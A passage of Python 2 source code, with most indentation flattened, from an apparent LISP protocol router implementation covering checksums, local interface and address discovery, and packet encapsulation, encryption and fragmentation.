# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Compute the IGMP checksum. This is specialized for a 12-byte IGMP query
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get an interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
    #endfor
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
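#
# For example (values chosen for illustration):
#
# >>> lisp_is_mac_string("0011-2233-4455")
# True
# >>> lisp_is_mac_string("0011-2233-4455/48")
# True
# >>> lisp_is_mac_string("00:11:22:33:44:55")
# False
#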
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
        # Ignore bogus interface names that containers may create. Allow
        # interface names with colons, dashes, and alphanumeric characters.
#
        d = device.replace(":", "")
        d = d.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
        if (address.is_private_address()): return(address)
        addr = a
    #endfor
    return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
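    #
    # For illustration only (the device name is hypothetical): a value of
    # "eth0:2" selects the second address on eth0, "2" selects the second
    # address on the first usable device, and "eth0:" selects the first
    # address on eth0.
    #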
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
        # ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
        # IV, and the ciphertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
        # Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
            # This is the 4-tuple NAT case. There is another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
        # Call the AES or chacha cipher. For AES-CBC, make sure the ciphertext
        # length is a multiple of 16 bytes.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
        # Now fix the outer IPv4 header with fragment-offset values and the
        # total-length field, and prepend it to each fragment.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
        # IP_HDRINCL requires the total-length and frag-offset fields to be
        # in host byte order. We need to build the total-length field just
        # like lisp_packet.encode(), checksum, and then fix the outer header.
        # That logic is semantically replicated here. The same logic is in
        # lisp_packet.fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
        return(True)
    #enddef
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
        # If the inner header is IPv4, we will fragment the inner packet and
        # encap each fragment. If the inner header is IPv6, we will not insert
        # a Fragment Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
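        # For example (hypothetical sizes, original packet not already a
        # fragment): a 3000-byte inner payload was chunked above into 1400,
        # 1400, and 200 bytes; the loop below writes inner frag-offsets of
        # 0, 175, and 350 (in 8-byte units) and sets MF on all but the last.
        #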
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
            # Set the length of the fragment, advance the offset for the next
            # fragment-offset, and compute the header checksum for the
            # fragment. Then prepend the inner header to the payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
            # Change the outer header length and header checksum if the outer
            # header is IPv4. If the outer header is IPv6, the raw socket
            # prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
        # in host byte order, so they have to be byte-swapped here. But when
        # testing, we (UPC guys) discovered the frag field didn't need
        # swapping. The conclusion is that byte-swapping is necessary for
        # MacOS but not for Linux OSes.
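        # On MacOS both the total-length (bytes 2-3) and frag-offset (bytes
        # 6-7) are swapped below; on other OSes only the total-length is.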
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
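        #
        # Offsets below assume an IPv4 outer header with no options: the
        # protocol field is at byte 9 and the UDP source/dest ports are at
        # bytes 20-21 and 22-23.
        #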
